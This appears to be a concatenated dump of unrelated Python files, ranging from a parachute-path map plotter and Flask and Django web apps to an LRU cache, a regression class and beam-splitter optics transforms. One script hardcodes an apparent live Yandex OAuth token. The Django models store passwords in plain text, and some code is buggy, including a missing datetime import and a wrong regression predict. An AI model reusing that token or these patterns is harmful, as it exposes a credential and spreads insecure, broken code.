RESOURCES_FOLDER_PATH = CONFIG_OPTIONS.get(RESOURCES_FOLDER_PATH_KEY, os.sep.join([utilities.get_root_path(), RESOURCES_FOLDER]))
MAP_FILES = CONFIG_OPTIONS.get(MAP_FILES_KEY, {})
MAP_FILE_PATHS = CONFIG_OPTIONS.get(MAP_FILE_PATHS_KEY, {})
MAP_FILE_EXTENSION = CONFIG_OPTIONS.get(MAP_FILE_EXTENSION_KEY, "jpeg")
OUTPUT_FOLDER = CONFIG_OPTIONS.get(OUTPUT_FOLDER_KEY, "temp")
OUTPUT_FOLDER_PATH = CONFIG_OPTIONS.get(OUTPUT_FOLDER_PATH_KEY, os.sep.join([utilities.get_root_path(), OUTPUT_FOLDER]))
def __init__(self, **kwargs):
self.map_file_paths = kwargs.get(self.MAP_FILE_PATHS_KEY)
if(not self.MAP_FILE_PATHS):
self.map_file_paths = {}
for map_name, map_path in self.MAP_FILES.items():
self.map_file_paths[map_name] = os.sep.join([self.RESOURCES_FOLDER_PATH, map_path])
self.map_file_extension = kwargs.get(self.MAP_FILE_EXTENSION_KEY, self.MAP_FILE_EXTENSION)
self.output_folder_path = kwargs.get(self.OUTPUT_FOLDER_PATH_KEY, self.OUTPUT_FOLDER_PATH)
self.maps = {}
## Prep the temp dir for image saving/deletion
if(self.output_folder_path):
self._init_dir()
def _init_dir(self):
if(not os.path.exists(self.output_folder_path)):
os.makedirs(self.output_folder_path)
else:
for root, dirs, files in os.walk(self.output_folder_path, topdown=False):
for file in files:
try:
os.remove(os.sep.join([root, file]))
except OSError as e:
utilities.debug_print("Error removing file: {}, during temp dir cleanup.".format(file), e, debug_level=2)
def _generate_unique_file_name(self, extension):
time_ms = int(time.time() * 1000)
file_name = "{}.{}".format(time_ms, extension)
while(os.path.isfile(file_name)):
time_ms -= 1
file_name = "{}.{}".format(time_ms, extension)
return file_name
def load_base_maps(self):
maps = {}
try:
for map_name, map_path in self.map_file_paths.items():
maps[map_name] = Image.open(map_path)
except Exception as e:
utilities.debug_print("Error opening base_map.", e, debug_level=0)
return maps
def save_map(self, pillow_image, file_name=None):
file_name = self._generate_unique_file_name(self.map_file_extension) if not file_name else file_name
file_path = os.sep.join([self.output_folder_path, file_name])
try:
pillow_image.save(file_path, format=self.map_file_extension)
except IOError as e:
utilities.debug_print("Unable to save image at: '{}'.".format(file_path), e, debug_level=0)
return None
else:
return file_path
def create_delete_map_callback(self, path):
def _delete_map_callback():
try:
os.remove(path)
except OSError as e:
utilities.debug_print("Error deleting map at: '{}'.".format(path), e, debug_level=1)
return False
return True
return _delete_map_callback
class Plotter:
## Keys
PARACHUTE_CONFIG_KEY = "parachute_config"
PLANE_PATH_WIDTH_KM_KEY = "plane_path_width_km"
PLANE_PATH_COLOR_KEY = "plane_path_color"
SHORT_PARACHUTE_PATH_WIDTH_KM_KEY = "short_parachute_path_width_km"
SHORT_PARACHUTE_PATH_COLOR_KEY = "short_parachute_path_color"
LONG_PARACHUTE_PATH_WIDTH_KM_KEY = "long_parachute_path_width_km"
LONG_PARACHUTE_PATH_COLOR_KEY = "long_parachute_path_color"
TRIANGLE_SIZE_KM_KEY = "triangle_size_km"
TRIANGLE_COLOR_KEY = "triangle_color"
def __init__(self, **file_controller_kwargs):
self.file_controller = PlotterFileController(**file_controller_kwargs)
self.base_maps = self.file_controller.load_base_maps()
self.plane_path_width_km = CONFIG_OPTIONS.get(self.PLANE_PATH_WIDTH_KM_KEY, 0.1)
self.plane_path_color = CONFIG_OPTIONS.get(self.PLANE_PATH_COLOR_KEY, "white")
self.triangle_size_km = CONFIG_OPTIONS.get(self.TRIANGLE_SIZE_KM_KEY, 0.2)
self.triangle_color = CONFIG_OPTIONS.get(self.TRIANGLE_COLOR_KEY, "white")
self.parachute_config = CONFIG_OPTIONS.get(self.PARACHUTE_CONFIG_KEY, None)
assert(self.parachute_config != None)
def _rotate_coordinate(self, x, y, angle):
"""
Rotate a given coordinate around the origin by the specified angle.
"""
sin = math.sin(angle)
cos = math.cos(angle)
x_ = x * cos - y * sin
y_ = x * sin + y * cos
return (x_, y_)
def _scale_coordinate(self, x, y, scale_factor):
"""
Scale a given point by the given scale factor from the origin.
"""
return (x * scale_factor, y * scale_factor)
def _translate_coordinate(self, x1, y1, x2, y2):
"""
Translate a given point relative another point.
"""
return (x1 + x2, y1 + y2)
def _plot_line(self, image, x1, y1, x2, y2, width, color):
"""
Plot a line from (x1,y1) to (x2,y2) with a thickness of 'width' and colored in with 'color'.
"""
draw = ImageDraw.Draw(image, "RGBA")
draw.line([x1, y1, x2, y2], fill=color, width=width)
del draw
return image
def _plot_triangle(self, image, x, y, rotation, side_length, color):
"""
Plot a triangle centered on (x,y), rotated 'rotation' degrees clockwise from the east, and has side lengths of
'side_length' and colored in with 'color'.
"""
## Precalculate the 'unit' triangle's centered coords, facing east
coords = [(-0.283, -0.5), (-0.283, 0.5), (0.567, 0)]
## Calculate the triangle's side length scaling factor
scale_factor = side_length / 1
## Scale, rotate, and translate the coords about the origin
for index, coord in enumerate(coords):
_x, _y = self._rotate_coordinate(*coord, -rotation)
_x, _y = self._scale_coordinate(_x, _y, scale_factor)
coords[index] = self._translate_coordinate(_x, _y, x, y)
draw = ImageDraw.Draw(image, "RGBA")
draw.polygon(coords, fill=color, outline=color)
del draw
return image
def plot_plane_path(self, map_name, path_obj):
## Get a copy of the map, so it's never overridden
base_map = self.base_maps[map_name].copy()
pixels_per_km = base_map.size[0] // 8
## Get the height and width of the map image, and calculate the diagonal's length
map_width, map_height = base_map.size
map_diagonal_length = int(math.sqrt(pow(map_width, 2) + pow(map_height, 2)))
## Get the x, y, and angle supplied by the user
x = path_obj.grid_obj.get_true_x(pixels_per_km)
y = path_obj.grid_obj.get_true_y(pixels_per_km)
angle = math.radians(path_obj.heading_obj.angle)
## Generate the x and y coord pairs for the plane's path line
x1 = x - map_diagonal_length * math.cos(angle)
y1 = y + map_diagonal_length * math.sin(angle) ## Invert both the y components; upside down coordinate system
x2 = x + map_diagonal_length * math.cos(angle)
y2 = y - map_diagonal_length * math.sin(angle)
## Get the correct parachute config from the dict
parachute_config = self.parachute_config[map_name]
## Prep widths
plane_path_width = int(self.plane_path_width_km * pixels_per_km)
triangle_size = int(self.triangle_size_km * pixels_per_km)
## *2 because the width is only half of what it should be, since players can drop in any direction
short_parachute_path_width = int(parachute_config[self.SHORT_PARACHUTE_PATH_WIDTH_KM_KEY] * pixels_per_km * 2)
long_parachute_path_width = int(parachute_config[self.LONG_PARACHUTE_PATH_WIDTH_KM_KEY] * pixels_per_km * 2)
## Plot the requisite lines
## Todo: plot in place
plotted_map = self._plot_line(base_map, x1, y1, x2, y2, long_parachute_path_width, parachute_config[self.LONG_PARACHUTE_PATH_COLOR_KEY])
plotted_map = self._plot_line(base_map, x1, y1, x2, y2, short_parachute_path_width, parachute_config[self.SHORT_PARACHUTE_PATH_COLOR_KEY])
plotted_map = self._plot_line(base_map, x1, y1, x2, y2, plane_path_width, self.plane_path_color)
plotted_map = self._plot_triangle(base_map, x, y, angle, triangle_size, self.triangle_color)
## return the final map
return plotted_map
|
18,336 | 7b53ceb25c9606816b65a6830c2deac95af5816c | import requests
import json
import os
token = 'AQAAAAA1ZV4rAAT7ozFhxJ47VUYgkXM9IImE1zk'
url = 'https://dialogs.yandex.net/api/v1/status'
headers = {'Host': 'https://dialogs.yandex.net/api/v1/status', f'Authorization': f'OAuth {token}'}
response = requests.get(url, headers=headers)
print(response.text) |
18,337 | 36f137ba3b581ffb024cc25198248c1a1894e0a9 | from flask import Flask, render_template, current_app, abort, request, redirect, url_for, send_from_directory
from flask_login import login_required, logout_user, login_user, current_user
from login import load_user
import bcrypt
from datetime import datetime
from database import Database
from specs import getRoles, getSpecializations, specsContains, decodeRoles
def home_page():
return render_template("home.html")
def image_server(filename):
return send_from_directory("./images", filename)
@login_required
def chat_page(chat_id):
user_data = current_user.data
if not Database.getInstance().IsUserInChatroom(user_data.id, chat_id):
abort(403)
past_messages = Database.getInstance().GetMessages(chat_id)
return render_template("messaging.html", room_id = chat_id, past_messages=past_messages, current_user_id=user_data.id)
@login_required
def mychats_page():
user_data = current_user.data
team_chats = Database.getInstance().GetTeamChatRooms(user_data.id)
private_chats = Database.getInstance().GetPrivateChatRooms(user_data.id)
return render_template("mychats.html", team_chats = team_chats, private_chats=private_chats)
def start_chat():
print(request.form)
other_user = request.form.get('user', None)
# TODO: Make sure private chat does not already exist
if other_user is None or other_user == current_user.get_id():
abort(404)
db = Database.getInstance()
chat_id = db.CreateChatroom()
db.JoinChatroom(current_user.get_id(), chat_id)
db.JoinChatroom(other_user, chat_id)
return redirect(url_for("chat_page", chat_id=chat_id))
def gamejams_page(status):
if request.method == "GET":
database = Database.getInstance()
if status == "Active":
gamejams = database.GetActiveGameJams()
elif status == "Ongoing":
gamejams = database.GetOngoingGameJams()
elif status == "Past":
gamejams = database.GetPastGameJams()
elif status == "Upcoming":
gamejams = database.GetUpcomingGameJams()
elif status == "All":
gamejams = database.GetAllGameJams()
else:
abort(404)
return render_template("gamejams.html", now = datetime.now(), gamejams = sorted(gamejams, key=lambda x: x.startDate, reverse=False))
else:
return redirect(url_for("gamejams_page", status = request.form.get("status","ALL")))
def gamejams_redirect():
return redirect(url_for("gamejams_page", status = 'Active'))
@login_required
def jam_page(jam_id):
if request.method == "GET":
jam = Database.getInstance().GetGameJam(jam_id)
if not jam:
abort(404)
else:
attending = Database.getInstance().GetUsersAttending(jam_id)
current_user_id = current_user.data.id
user_attending = next((x for x in attending if x.id == current_user_id), None)
return render_template(
"jam_info.html",
jam = jam,
now = datetime.now(),
attending = attending,
current_user_attending = user_attending
)
elif request.method == "POST":
if request.form.get('delete', None) is not None:
Database.getInstance().DeleteGameJam(jam_id)
return redirect(url_for("myjams_page"))
elif request.form.get('join', None) is not None:
Database.getInstance().UserAttendJam(current_user.data.id, jam_id)
#TODO: Redirect to teams page
return redirect(url_for("jam_page", jam_id = jam_id))
return redirect(url_for("jam_page", jam_id = jam_id))
def render_jam_page(values, current_datetime, edit_mode = False):
return render_template("newjam.html", values = values, min = current_datetime, edit_mode = edit_mode)
@login_required
def newjam_page():
if request.method == "GET":
current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
values = { "data": {"startDate": current_datetime, "endDate": current_datetime}}
return render_jam_page(values, current_datetime)
else:
valid = validate_newjam_form(request.form)
if not valid:
current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
return render_jam_page(request.form, current_datetime)
data = request.form.data
id = Database.getInstance().AddNewJam(
name = data['name'],
theme = data['theme'],
startDateString = data['startDate'],
endDateString = data['endDate'],
about = data['about']
)
Database.getInstance().UserAttendJam(current_user.data.id, id, True)
return redirect(url_for("jam_page", jam_id=id))
@login_required
def editjam_page(jam_id):
if request.method == "GET":
jam = Database.getInstance().GetGameJam(jam_id)
if jam is None:
abort(404)
current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
values = {
"data": {
"startDate": '{date:%Y-%m-%dT%H:%M}'.format(date=jam.startDate),
"endDate": '{date:%Y-%m-%dT%H:%M}'.format(date=jam.endDate),
"name": jam.name,
"theme": jam.theme,
"about": jam.about
}
}
return render_jam_page(values, current_datetime, edit_mode = True)
else:
valid = validate_newjam_form(request.form)
if not valid:
current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
return render_jam_page(request.form, current_datetime, edit_mode = True)
data = request.form.data
Database.getInstance().UpdateJam(
jam_id = jam_id,
name = data['name'],
theme = data['theme'],
startDateString = data['startDate'],
endDateString = data['endDate'],
about = data['about']
)
return redirect(url_for("jam_page", jam_id=jam_id))
def validate_newjam_form(form):
form.data = {}
form.errors = {}
#validate dates
startDateString = form.get("startDate", "2021-01-01T00:00")
startDate = datetime.strptime(startDateString, '%Y-%m-%dT%H:%M')
form.data['startDate'] = startDateString
endDateString = form.get("endDate", "2021-01-01T00:00")
endDate = datetime.strptime(endDateString, '%Y-%m-%dT%H:%M')
form.data['endDate'] = endDateString
if endDate <= startDate:
form.errors['endDate'] = "End date must be after start date!"
# validate jam name
jam_name = form.get("name", "").strip()
if len(jam_name) == 0:
form.errors["name"] = "Jam name can not be blank."
elif len(jam_name) > 255:
form.errors["name"] = "Jam name is too long."
else:
form.data["name"] = jam_name
# validate jam theme
theme = form.get("theme", "").strip()
if len(theme) == 0:
form.errors["theme"] = "Theme can not be blank."
elif len(theme) > 255:
form.errors["theme"] = "Theme is too long."
else:
form.data["theme"] = theme
form.data["about"] = form.get("about", "")
return len(form.errors) == 0
def teams_page(jam_id):
teams = Database.getInstance().GetTeams(jam_id)
return render_template('teams.html', teams=teams, jam_id=jam_id)
def viewteam_page(team_id):
if request.method == "GET":
team = Database.getInstance().GetTeam(team_id)
if team is None:
abort(404)
team.roles = decodeRoles(team.looking_for)
return render_template('team_info.html', team=team, moderator=team.leader_id == current_user.data.id)
else:
if request.form.get('delete', None) is not None:
Database.getInstance().DeleteTeam(team_id)
return redirect(url_for("home_page"))
@login_required
def editteam_page(jam_id, team_id):
# TODO: Check if jam exists and user is in it
if request.method == "GET":
team = Database.getInstance().GetTeam(team_id)
if team is None:
abort(404)
print(team.name)
values = { "data":
{
'name': team.name,
'about': team.about,
'specs': team.looking_for
}}
return render_template(
"newteam.html",
values = values,
pow = pow,
options = getSpecializations(),
contains = specsContains,
edit_mode = True
)
else:
valid = validate_newteam_form(request.form, getSpecializations())
if not valid:
return render_template(
"newteam.html",
values = request.form,
pow = pow,
options = getSpecializations(),
contains = specsContains,
edit_mode = True
)
data = request.form.data
Database.getInstance().UpdateTeam(
name = data['name'],
about = data['about'],
specs = data['specs'],
team_id = team_id
)
return redirect(url_for("viewteam_page", team_id=team_id))
@login_required
def newteam_page(jam_id):
# TODO: Check if jam exists and user is in it
if request.method == "GET":
values = { "data": {}}
return render_template(
"newteam.html",
values = values,
pow = pow,
options = getSpecializations(),
contains = specsContains,
edit_mode = False
)
else:
valid = validate_newteam_form(request.form, getSpecializations())
if not valid:
return render_template(
"newteam.html",
values = request.form,
pow = pow,
options = getSpecializations(),
contains = specsContains,
edit_mode = False
)
db = Database.getInstance()
chat_id = db.CreateChatroom()
data = request.form.data
team_id = db.CreateTeam(
name = data['name'],
about = data['about'],
specs = data['specs'],
creator_id = current_user.get_id(),
jam_id = jam_id,
chat_id = chat_id
)
user_id = current_user.get_id()
db.JoinChatroom(user_id=user_id, chat_id=chat_id)
db.JoinTeam(user_id=user_id, team_id=team_id)
return redirect(url_for("viewteam_page", team_id=team_id))
def validate_newteam_form(form, options):
form.data = {}
form.errors = {}
# validate name
team_name = form.get("name", "").strip()
if len(team_name) == 0:
form.errors["name"] = "Name can not be blank."
elif len(team_name) > 255:
form.errors["name"] = "Name is too long."
else:
form.data["name"] = team_name
# validate about
about = form.get("about", "").strip()
if len(about) == 0:
form.errors["about"] = "About can not be blank."
elif len(about) > 511:
form.errors["about"] = "About is too long."
else:
form.data["about"] = about
# validate looking_for
specs = 0
for option in options:
specs += int(form.get(option, 0))
form.data["specs"] = specs
return len(form.errors) == 0
@login_required
def myjams_page():
gamejams = Database.getInstance().GetGameJamsAttending(current_user.get_id())
return render_template(
"mygamejams.html",
now = datetime.now(),
gamejams = sorted(gamejams['attending'], key=lambda x: x.startDate, reverse=False),
moderating = sorted(gamejams['moderating'], key=lambda x: x.startDate, reverse=False)
)
def profile_page(user_id):
viewed_user = Database.getInstance().GetUser(user_id)
if not viewed_user:
abort(404)
else:
return render_template("profile.html", user= viewed_user, other_user = True)
@login_required
def my_profile_page():
user_data = current_user.data
if request.method == "GET":
return render_template("profile.html", user= user_data , other_user = False)
else:
Database.getInstance().DeleteUser(user_data.id)
return redirect(url_for('home_page'))
@login_required
def editprofile_page():
user_data = current_user.data
if request.method == "GET":
names = user_data.name.split(' ')
first_name = ' '.join(names[:-1])
last_name = names[-1]
values = {
"data":{
"firstname": first_name,
"lastname": last_name,
"about": user_data.about,
"primary": user_data.primary_spec_raw,
"secondary": user_data.secondary_specs_raw,
"experience": user_data.experience,
}
}
return render_template(
"signup.html",
values = values,
pow = pow,
options = getSpecializations(),
contains = specsContains,
edit_mode = True
)
else:
options = getSpecializations()
valid = validate_signup_form(request.form, options, True)
if not valid:
return render_template(
"signup.html",
values=request.form,
pow = pow,
options = options,
contains = specsContains
)
data = request.form.data
Database.getInstance().UpdateUser(
user_id = user_data.id,
first_name = data["firstname"],
last_name = data["lastname"],
about = data["about"],
primary_spec = data["primary"],
secondary_spec = data["secondary"],
experience = data["experience"]
)
return redirect(url_for("my_profile_page"))
def signup_page():
if request.method == "GET":
values = { "data": {"password": ""}}
return render_template(
"signup.html",
values = values,
pow = pow,
options = getSpecializations(),
contains = specsContains,
edit_mode = False
)
else:
options = getSpecializations()
valid = validate_signup_form(request.form, options)
if not valid:
return render_template(
"signup.html",
values=request.form,
pow = pow,
options = options,
contains = specsContains
)
Database.getInstance().AddNewUser(
email = request.form.data["email"],
first_name = request.form.data["firstname"],
last_name = request.form.data["lastname"],
about = request.form.data["about"],
primary_spec = request.form.data["primary"],
secondary_spec = request.form.data["secondary"],
experience = request.form.data["experience"],
password = request.form.data["password"]
)
return redirect(url_for("home_page"))
def validate_signup_form(form, options, edit_mode = False):
form.data = {}
form.errors = {}
# validate first name
first_name = form.get("firstname", "").strip()
if len(first_name) == 0:
form.errors["firstname"] = "First name can not be blank."
elif len(first_name) > 127:
form.errors["firstname"] = "First name is too long."
else:
form.data["firstname"] = first_name
# validate last name
last_name = form.get("lastname", "").strip()
if len(last_name) == 0:
form.errors["lastname"] = "Last name can not be blank."
elif len(last_name) > 127:
form.errors["lastname"] = "Last name is too long."
else:
form.data["lastname"] = last_name
if not edit_mode:
# validate email
email = form.get("email", "").strip()
if len(email) == 0:
form.errors["email"] = "Email can not be blank."
elif Database.getInstance().GetUser(email, field = 'email'):
form.errors["email"] = "Email already in use."
else:
form.data["email"] = email
# validate password
password = form.get("password", "")
if len(password) == 0:
form.errors["password"] = "Password can not be blank."
elif False:
# TODO:validate password
pass
else:
form.data["password"] = password
primary_spec = int(form.get("primary", -1))
if primary_spec < 0:
form.errors["primary"] = "You must choose a primary specialization."
else:
form.data["primary"] = primary_spec
secondary_spec = 0
for option in options:
secondary_spec += int(form.get(option, 0))
form.data["secondary"] = secondary_spec
about = form.get("about", "").strip()
if len(about) == 0:
form.errors["about"] = "About can not be blank."
else:
form.data["about"] = about
experience = form.get("experience", "").strip()
if len(experience) == 0:
form.errors["experience"] = "Experience can not be blank."
else:
form.data["experience"] = experience
return len(form.errors) == 0
def login_page():
if request.method == "GET":
values = { "data": {"password": ""}}
return render_template(
"login.html",
values = values
)
else:
valid = validate_login_form(request.form)
if not valid:
return render_template(
"login.html",
values=request.form,
)
login_user(load_user(request.form.data["user"].id))
return redirect(url_for("home_page"))
def validate_login_form(form):
form.data = {}
form.errors = {}
email = form.get("email", "").strip()
if len(email) == 0:
form.errors["email"] = "Email can not be blank."
return False
user = Database.getInstance().GetUser(email, field = 'email')
form.data["user"] = user
if user is None :
form.data["email"] = email
form.errors["email"] = "Email is not registered"
return False
form.data["email"] = email
password = form.get("password", "")
if len(password) == 0:
form.errors["password"] = "Password can not be blank"
return False
if not Database.getInstance().ValidatePassword(email, password):
form.errors["password"] = "Password is incorrect"
return False
form.data["password"] = password
return len(form.errors) == 0
@login_required
def logout_page():
logout_user()
return redirect(url_for("home_page"))
|
18,338 | 63dcf14fa757864dad7c15fe6f83dde878126a96 | from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import JsonResponse
from django.db.models import Count
from BirthRegisterSystem.models import Area
from .models import NewChildInfo
import json
import datetime
def AddHospital(request):
return render(request, 'HospitalIndex.html')
def ScanCertificate(request):
return render(request, 'Scan.html')
def ApplyBirthCertificate(request):
Division = Area.objects.values(
'Division_name').distinct().order_by('Division_name')
return render(request, 'ApplyBirthCertificate.html', {'Division': Division})
def ApplyDeathCertificate(request):
return render(request, 'ApplyDeathCertificate.html')
def PrintBirthCertificate(request):
childInfo = NewChildInfo.objects.filter(Validation=1)
return render(request, 'PrintBirthCertificate.html', {'childInfo': childInfo})
def PrintDeathCertificate(request):
return render(request, 'PrintDeathCertificate.html')
def RequestForUpdate(request):
return render(request, 'RequestForUpdate.html')
def ApplyBirthCertificateForm(request):
name = request.POST["name"]
blood_group = request.POST["blood_group"]
birth_date = request.POST["birth_date"]
father_name = request.POST["father_name"]
father_nid = request.POST["father_nid"]
mother_name = request.POST["mother_name"]
religion = request.POST["religion"]
division = request.POST["DropDownDivision"]
district = request.POST["DropDownDistrict"]
upazila = request.POST["DropDownUpazila"]
union = request.POST["DropDownUnion"]
new_child_info = NewChildInfo(Name=name, Blood_group=blood_group, Birth_Date=birth_date,
Father_name=father_name, Father_NID=father_nid,
Mother_name=mother_name, Religion=religion, Division_name=division,
District_name=district, Upazila_name=upazila, Union_name=union)
new_child_info.save()
return render(request, 'ApplyBirthCertificate.html')
def getDistrict(request, division_name):
Districts = Area.objects.filter(Division_name=division_name).values(
'District_name').distinct().order_by('District_name')
return JsonResponse({"Districts": list(Districts)})
def getUpazila(request, district_name):
Upazilas = Area.objects.filter(District_name=district_name).values(
'Upazila_name').distinct().order_by('Upazila_name')
return JsonResponse({"Upazilas": list(Upazilas)})
def getUnion(request, upazila_name):
Unions = Area.objects.filter(Upazila_name=upazila_name).values(
'Union_name').distinct().order_by('Union_name')
return JsonResponse({"Unions": list(Unions)})
|
18,339 | 423c16e92770fba9a5f1f05a01cca47914245c4e | def main():
N, M = map(int, input().split())
cnt = 0
cnt = min(N, M//2)
M -= 2*cnt
if M > 0:
cnt += M//4
print(cnt)
if __name__ == "__main__":
main() |
18,340 | e614cb92627a84ea4654b7eba4efc40b2dd2d5f4 | import torch
import torch.nn as nn
import numpy as np
class dni_linear(nn.Module):
# TODO : initialise the last layer with zeroes
def __init__(self, input_dims, num_classes, dni_hidden_size=1024, conditioned=False):
super(dni_linear, self).__init__()
self.conditioned = conditioned
if self.conditioned:
dni_input_dims = input_dims+num_classes
else:
dni_input_dims = input_dims
self.layer1 = nn.Sequential(
nn.Linear(dni_input_dims, dni_hidden_size),
nn.BatchNorm1d(dni_hidden_size),
nn.ReLU()
)
self.layer2 = nn.Sequential(
nn.Linear(dni_hidden_size, dni_hidden_size),
nn.BatchNorm1d(dni_hidden_size),
nn.ReLU()
)
self.layer3 = nn.Linear(dni_hidden_size, input_dims)
def forward(self, x, y):
if self.conditioned:
assert y is not None
x = torch.cat((x, y), 1)
out = self.layer1(x)
out = self.layer2(out)
out = self.layer3(out)
return out
|
18,341 | 1f065e0f0cda84b0ea0074563d43fb4cd4d3f3fc | class LRUCache:
##### STEP 1: Initialization of the LRUCache class
# We will have 2 dictionaries for this implementation
# Use of each of them is provided below
def __init__(self, capacity: int):
self.capacity = capacity # Store the capacity of the cache
self.cache = {} # The actual cache as dictionary
self.timestamp = {} # A dictionary to store the recency of usage of various keys in the cache
##### STEP 2: This is used to get the element from the Cache. Basically it checks if the 'key' exists
# and returns -1 if it does not. If the key exists, it updates the 'timestamp' dictionary with a timestamp
# saying that a particular 'key' was used
def get(self, key: int) -> int:
if self.cache.get(key,-1)!=-1:
self.timestamp[key] = datetime.datetime.now() # 'timestamp' dictionary is updated for the key with the current time
return self.cache.get(key,-1) # Value is returned. If no value exists that -1 is returned
##### STEP 3: This is used to put value into the cache. It works on 3 conditions:
# 1. It checks if the key exists. If yes, it replaces it and updates the timestamp dictionary for that key
# 2. If no key exists and the number of keys in the dictionary 'cache' is less than capacity value,
# it just adds the new key:value pair and adds 'key' to timestamp as it was the latest one that was used
# 3. If number of keys in cache = capacity value, it finds the oldest key that was used using the timestamp
# dictionary and pops it out. The oldest key would be the one with the oldest timestamp value as we always
# update timestamp dictionary with latest time everytime a key is used.
def put(self, key: int, value: int) -> None:
# Getting the value for the 'key'
keycheck = self.get(key)
## First condition of STEP 3
if keycheck!=-1:
self.cache[key]=value
self.timestamp[key] = datetime.datetime.now()
## Second condition of STEP 3
elif keycheck==-1 and len(list(self.cache.keys()))<self.capacity:
self.cache[key]=value
self.timestamp[key] = datetime.datetime.now()
## Third Condition of STEP 3
elif keycheck==-1 and len(list(self.cache.keys()))==self.capacity:
## NOTE: The oldestkey formula can be replaced by the following:
# min(self.timestamp.keys(), key = lambda x: self.timestamp.get(x)), But for some reason leetcode
# takes more time for this and times out. so, I used the one below.
oldestkey = min(self.timestamp, key=self.timestamp.get)
self.cache.pop(oldestkey)
self.timestamp.pop(oldestkey)
self.cache[key] = value
self.timestamp[key] = datetime.datetime.now()
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
|
18,342 | 0b72b27113cdd9dfed27eb58da60a11cbadcacc3 | # Generated by Django 3.1.7 on 2021-04-09 13:16
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ForgotPassword',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('passwordID', models.CharField(max_length=255)),
('username', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('status', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('likeID', models.CharField(max_length=255)),
('postAuthor', models.CharField(max_length=255)),
('likeAuthor', models.CharField(max_length=255)),
('likeDate', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('postID', models.CharField(max_length=255)),
('postPreview', models.CharField(max_length=500)),
('content', models.CharField(max_length=500)),
('author', models.CharField(max_length=255)),
('publish_date', models.CharField(max_length=255)),
('like_count', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('userID', models.CharField(max_length=255)),
('username', models.CharField(max_length=255)),
('photo', models.ImageField(blank=True, null=True, upload_to='Images/')),
('fullname', models.CharField(max_length=255)),
('email', models.CharField(max_length=255)),
('birtdate', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('last_join', models.CharField(max_length=255)),
('about', models.CharField(max_length=255)),
('me_flow', models.CharField(max_length=255)),
('flow', models.CharField(max_length=255)),
],
),
]
|
18,343 | c6f64e8a72a36c610fa770cee7703fb617fde4ec | from .ModelInterface import ModelInterface
import numpy as np
class MultipleLinearRegression(ModelInterface):
def __init__(self):
self._w = 0
def fit(self, X, y):
self._w = np.linalg.solve(np.dot(X.T, X), np.dot(X.T, y))
return self
def predict(self, X):
return self._w * X
def score(self, X, y):
m = y - np.mean(y)
n = y - self.predict(X)
return 1 - (n.dot(n) / m.dot(m))
|
18,344 | 6e6b4a89c4256d4e190f6113d8caacb9191246b1 | import cmath
import numpy as np
from scipy.misc import factorial as fact
from math import sqrt, factorial
def bs2x2_transform(t, r, input_state):
"""
Two channels (2x2) beam splitter transformation.
With: t^2 + r^2 = 1.
:param t: Transmission coefficient.
:param r: Reflection coefficient.
:param input_state: Unapplied state in two channels(modes).
:return: Transformed unapplied state in two channels(modes).
"""
size = len(input_state)
output_state = np.zeros((size*2 - 1, size*2 - 1), dtype=complex)
for m in range(size):
for n in range(size):
# two sums up to m and n
for k in range(m + 1):
for l in range(n + 1):
first_index = m - k + l # first channel index
second_index = k + n - l # second channel index
coeff = input_state[m, n] * (1j*r)**(k + l) * t**(m - k + n - l) * factorial(m) * factorial(n) / (factorial(k) * factorial(m - k) * factorial(l) * factorial(n - l))
output_state[first_index, second_index] = output_state[first_index, second_index] + coeff
return output_state
def two_bs2x4_transform(t1, r1, t2, r2, input_state):
"""
Transformation at 2 beam splitters.
Two input channels and four output channles - 2x4 transformation.
Creation operators transformation:
a1 => t1 a2 + i r1 a1.
a2 => t2 a4 + i r2 a3.
With transmission and reflection coefficients:
t1^2 + r1^2 = 1.
t2^2 + r2^2 = 1.
:param t1: BS1 transmission.
:param r1: BS1 reflection.
:param t2: BS2 transmission.
:param r2: BS2 reflection.
:param input_state: Two channels(modes) unapllied state.
:return: Four channels(modes) unapllied state.
"""
size = len(input_state)
output_state = np.zeros((size,) * 4, dtype=complex)
for m in range(size):
for n in range(size):
for k in range(m + 1):
for l in range(n + 1):
# channels indexes
ind1 = k
ind2 = m - k
ind3 = l
ind4 = n - l
coeff = input_state[m, n] * t1**(m - k) * (1j*r1)**k * t2**(n - l) * (1j*r2)**l * factorial(m) * factorial(n) / (factorial(k) * factorial(m - k) * factorial(l) * factorial(n - l))
output_state[ind1, ind2, ind3, ind4] = output_state[ind1, ind2, ind3, ind4] + coeff
return output_state
def two_bs2x4_transform_opt(t1, r1, t2, r2, input_state):
"""
Transformation at 2 beam splitters. Optimised version
Two input channels and four output channles - 2x4 transformation.
Creation operators transformation:
a1 => t1 a2 + i r1 a1.
a2 => t2 a4 + i r2 a3.
With transmission and reflection coefficients:
t1^2 + r1^2 = 1.
t2^2 + r2^2 = 1.
:param t1: BS1 transmission.
:param r1: BS1 reflection.
:param t2: BS2 transmission.
:param r2: BS2 reflection.
:param input_state: Two channels(modes) unapllied state.
:return: Four channels(modes) unapllied state.
"""
size = len(input_state)
out = np.zeros((size,) * 4, dtype=complex)
def coef(k1, k2, k3, k4):
return t1 ** k2 * (1j * r1) ** k1 * t2 ** k4 * (1j * r2) ** k3 / (factorial(k1) * factorial(k2) * factorial(k3) * factorial(k4))
# index 'i' = (m,n,k,l)
for i in np.ndindex(size, size, size, size):
if i[2] <= i[0] and i[3] <= i[1] and i[0] + i[1] < size:
